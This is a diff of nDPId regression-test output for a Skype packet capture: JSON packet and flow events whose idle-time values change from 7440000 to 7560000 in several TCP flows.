-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2291,"source":"skype.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":2,"flow_last_seen":1431969723031,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969723031,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADQGqCzUoQgkwKgBIjRQw9LBK81pkQ1wwaASOJBYJAAAAgQFrAQCCAo\/mk5jPiPECQEDAwk="} 
-00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2292,"source":"skype.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":3,"flow_last_seen":1431969723031,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969723031,"pkt":"0NQSxnP1PBXCt3IOCABFAAA04iJAAEAGuhHAqAEi1KEIJMPSNFCRDXDBwSvNaoAQECyvBQAAAQEICj4jxFI\/mk5j"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2291,"source":"skype.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":2,"flow_last_seen":1431969723031,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969723031,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADQGqCzUoQgkwKgBIjRQw9LBK81pkQ1wwaASOJBYJAAAAgQFrAQCCAo\/mk5jPiPECQEDAwk="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2292,"source":"skype.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":3,"flow_last_seen":1431969723031,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969723031,"pkt":"0NQSxnP1PBXCt3IOCABFAAA04iJAAEAGuhHAqAEi1KEIJMPSNFCRDXDBwSvNaoAQECyvBQAAAQEICj4jxFI\/mk5j"} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2313,"source":"skype.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":3,"flow_last_seen":1431969723864,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431969723864,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuQpkAAEARjprAqAEisBo3pzLd+R0AGtW0noACYJ7Q\/f1BEkFMtKs2xKkA"} 
00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2314,"source":"skype.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":3,"flow_last_seen":1431969723864,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431969723864,"pkt":"0NQSxnP1PBXCt3IOCABFAAAujeYAAEARD0nAqAEiTLnPDDLdsbUAGk80noICQMd2CkIbTJvr2m+0rjWR"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2315,"source":"skype.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969723979,"flow_last_seen":1431969723979,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969723979,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63421,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -976,22 +976,22 @@ 00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2316,"source":"skype.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969723979,"flow_last_seen":1431969723979,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969723979,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65037,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2320,"source":"skype.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":3,"flow_last_seen":1431969724089,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969724089,"pkt":"0NQSxnP1PBXCt3IOCABFAABAyr4AAEARLHvAqAEiwKgBAc3qADUALN\/7ZhIBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAAQAB"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2321,"source":"skype.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":3,"flow_last_seen":1431969724089,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969724089,"pkt":"0NQSxnP1PBXCt3IOCABFAABAk9AAAEARY2nAqAEiwKgBAcpaADUALFPq9ZgBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAHAAB"} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2329,"source":"skype.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969724570,"flow_last_seen":1431969724570,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969724570,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50131,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2329,"source":"skype.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":1,"flow_last_seen":1431969724570,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969724570,"pkt":"0NQSxnP1PBXCt3IOCABFAABAJs1AAEAGdVvAqAEi1KEIJMPTNFCYsmkqAAAAALAC\/\/+V\/gAAAgQFtAEDAwUBAQgKPiPKSgAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2330,"source":"skype.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":2,"flow_last_seen":1431969724644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969724644,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADQGqCzUoQgkwKgBIjRQw9NEN1OLmLJpK6ASOJD4ewAAAgQFrAQCCAo\/mJ6PPiPKSgEDAwk="} 
-00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2331,"source":"skype.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":3,"flow_last_seen":1431969724644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969724644,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0kBRAAEAGDCDAqAEi1KEIJMPTNFCYsmkrRDdTjIAQECxPXAAAAQEICj4jypQ\/mJ6P"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2329,"source":"skype.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969724570,"flow_last_seen":1431969724570,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969724570,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50131,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2329,"source":"skype.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":1,"flow_last_seen":1431969724570,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969724570,"pkt":"0NQSxnP1PBXCt3IOCABFAABAJs1AAEAGdVvAqAEi1KEIJMPTNFCYsmkqAAAAALAC\/\/+V\/gAAAgQFtAEDAwUBAQgKPiPKSgAAAAAEAgAA"} 
+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2330,"source":"skype.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":2,"flow_last_seen":1431969724644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969724644,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADQGqCzUoQgkwKgBIjRQw9NEN1OLmLJpK6ASOJD4ewAAAgQFrAQCCAo\/mJ6PPiPKSgEDAwk="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2331,"source":"skype.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":3,"flow_last_seen":1431969724644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969724644,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0kBRAAEAGDCDAqAEi1KEIJMPTNFCYsmkrRDdTjIAQECxPXAAAAQEICj4jypQ\/mJ6P"} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2353,"source":"skype.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":2,"flow_last_seen":1431969725034,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969725034,"pkt":"0NQSxnP1PBXCt3IOCABFAABLrvwAAEARSDLAqAEiwKgBAfe9ADUAN4CxqiYBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2354,"source":"skype.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":2,"flow_last_seen":1431969725034,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969725034,"pkt":"0NQSxnP1PBXCt3IOCABFAABLUrMAAEARpHvAqAEiwKgBAf4NADUANx167A0BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2364,"source":"skype.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969725833,"flow_last_seen":1431969725833,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969725833,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50132,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2364,"source":"skype.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":1,"flow_last_seen":1431969725833,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969725833,"pkt":"0NQSxnP1PBXCt3IOCABFAABANR9AAEAGjrLAqAEilQ0gD8PUNFDIS2mSAAAAALAC\/\/+IvwAAAgQFtAEDAwUBAQgKPiPPMAAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2365,"source":"skype.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":2,"flow_last_seen":1431969725886,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969725886,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGzs2VDSAPwKgBIjRQw9RkpUGCyEtpk6ASOJCS6wAAAgQFrAQCCAo\/guiRPiPPMAEDAwk="} 
-00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2366,"source":"skype.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":3,"flow_last_seen":1431969725886,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969725886,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0FRFAAEAGrszAqAEilQ0gD8PUNFDIS2mTZKVBg4AQECzp4QAAAQEICj4jz2Q\/guiR"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2364,"source":"skype.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969725833,"flow_last_seen":1431969725833,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969725833,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50132,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2364,"source":"skype.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":1,"flow_last_seen":1431969725833,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969725833,"pkt":"0NQSxnP1PBXCt3IOCABFAABANR9AAEAGjrLAqAEilQ0gD8PUNFDIS2mSAAAAALAC\/\/+IvwAAAgQFtAEDAwUBAQgKPiPPMAAAAAAEAgAA"} 
+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2365,"source":"skype.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":2,"flow_last_seen":1431969725886,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969725886,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGzs2VDSAPwKgBIjRQw9RkpUGCyEtpk6ASOJCS6wAAAgQFrAQCCAo\/guiRPiPPMAEDAwk="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2366,"source":"skype.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":3,"flow_last_seen":1431969725886,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969725886,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0FRFAAEAGrszAqAEilQ0gD8PUNFDIS2mTZKVBg4AQECzp4QAAAQEICj4jz2Q\/guiR"} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2379,"source":"skype.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":3,"flow_last_seen":1431969726134,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969726134,"pkt":"0NQSxnP1PBXCt3IOCABFAABLBEcAAEAR8ufAqAEiwKgBAfe9ADUAN4CxqiYBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2380,"source":"skype.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":3,"flow_last_seen":1431969726134,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969726134,"pkt":"0NQSxnP1PBXCt3IOCABFAABLzWEAAEARKc3AqAEiwKgBAf4NADUANx167A0BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2410,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969727446,"flow_last_seen":1431969727446,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969727446,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50133,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2410,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":1,"flow_last_seen":1431969727446,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969727446,"pkt":"0NQSxnP1PBXCt3IOCABFAABAw6JAAEAGAC\/AqAEilQ0gD8PVNFDxI3WvAAAAALAC\/\/9NiQAAAgQFtAEDAwUBAQgKPiPVcAAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2412,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":2,"flow_last_seen":1431969727498,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969727498,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGzs2VDSAPwKgBIjRQw9XOgDWr8SN1sKASOJC1wgAAAgQFrAQCCAo\/fSyFPiPVcAEDAwk="} 
-00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2413,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":3,"flow_last_seen":1431969727498,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969727498,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0a9FAAEAGWAzAqAEilQ0gD8PVNFDxI3WwzoA1rIAQECwMugAAAQEICj4j1aM\/fSyF"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2410,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969727446,"flow_last_seen":1431969727446,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969727446,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50133,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2410,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":1,"flow_last_seen":1431969727446,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969727446,"pkt":"0NQSxnP1PBXCt3IOCABFAABAw6JAAEAGAC\/AqAEilQ0gD8PVNFDxI3WvAAAAALAC\/\/9NiQAAAgQFtAEDAwUBAQgKPiPVcAAAAAAEAgAA"} 
+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2412,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":2,"flow_last_seen":1431969727498,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969727498,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGzs2VDSAPwKgBIjRQw9XOgDWr8SN1sKASOJC1wgAAAgQFrAQCCAo\/fSyFPiPVcAEDAwk="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2413,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":3,"flow_last_seen":1431969727498,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969727498,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0a9FAAEAGWAzAqAEilQ0gD8PVNFDxI3WwzoA1rIAQECwMugAAAQEICj4j1aM\/fSyF"} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2451,"source":"skype.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":3,"flow_last_seen":1431969728511,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1431969728511,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAABIsLcAAEARRULAqAFcwKgB\/+EV4RUANFGUU3BvdFVkcDB5FYpWEIvHwwABAARIlcIDhMAbG8d8ZX7RWey9o+VAQ2IEJyw="} 
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2460,"source":"skype.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969728749,"flow_last_seen":1431969728749,"flow_idle_time":180000,"flow_min_l4_payload_len":499,"flow_max_l4_payload_len":499,"flow_tot_l4_payload_len":499,"flow_avg_l4_payload_len":499,"midstream":0,"thread_ts_msec":1431969728749,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"239.255.255.250","src_port":50084,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01110{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2460,"source":"skype.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":1,"flow_last_seen":1431969728749,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":541,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":541,"pkt_l4_len":507,"thread_ts_msec":1431969728749,"pkt":"AQBef\/\/6xCwDBkn+CABFAAIPEXQAAAER9GvAqAFc7\/\/\/+sOkB2wB+wkMTk9USUZZICogSFRUUC8xLjENCkhvc3Q6MjM5LjI1NS4yNTUuMjUwOjE5MDANCk5UOnVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6Q29ubmVjdGlvbk1hbmFnZXI6MQ0KTlRTOnNzZHA6YWxpdmUNCkxvY2F0aW9uOmh0dHA6Ly8xMC4yMTEuNTUuMzoyODY5L3VwbnBob3N0L3VkaGlzYXBpLmRsbD9jb250ZW50PXV1aWQ6MmNiYzc4NWUtMjVmNC00MGNhLTk4YjUtMGQ1ODA0YWRhYThlDQpVU046dXVpZDoyY2JjNzg1ZS0yNWY0LTQwY2EtOThiNS0wZDU4MDRhZGFhOGU6OnVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6Q29ubmVjdGlvbk1hbmFnZXI6MQ0KQ2FjaGUtQ29udHJvbDptYXgtYWdlPTkwMA0KU2VydmVyOk1pY3Jvc29mdC1XaW5kb3dzLU5ULzUuMSBVUG5QLzEuMCBVUG5QLURldmljZS1Ib3N0LzEuMA0KT1BUOiJodHRwOi8vc2NoZW1hcy51cG5wLm9yZy91cG5wLzEvMC8iOyBucz0wMQ0KMDEtTkxTOmQ0NmQ1MDA5ZTE0NzFiYTY4MDBlNDNlN2YwZTEyZWU0DQoNCg=="} 
@@ -1001,7 +1001,7 @@ 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2528,"source":"skype.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969735255,"flow_last_seen":1431969735255,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969735255,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"106.188.249.186","src_port":13021,"dst_port":15120,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2528,"source":"skype.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":1,"flow_last_seen":1431969735255,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431969735255,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuQGgAAEARFBbAqAEiarz5ujLdOxAAGjrunqMCSv26L3gQtCJn9dl5F8Bv"} 00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2528,"source":"skype.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969735255,"flow_last_seen":1431969735255,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969735255,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"106.188.249.186","src_port":13021,"dst_port":15120,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2580,"source":"skype.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431969715510,"flow_last_seen":1431969745372,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2872,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1431969745372,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50117,"dst_port":18767,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 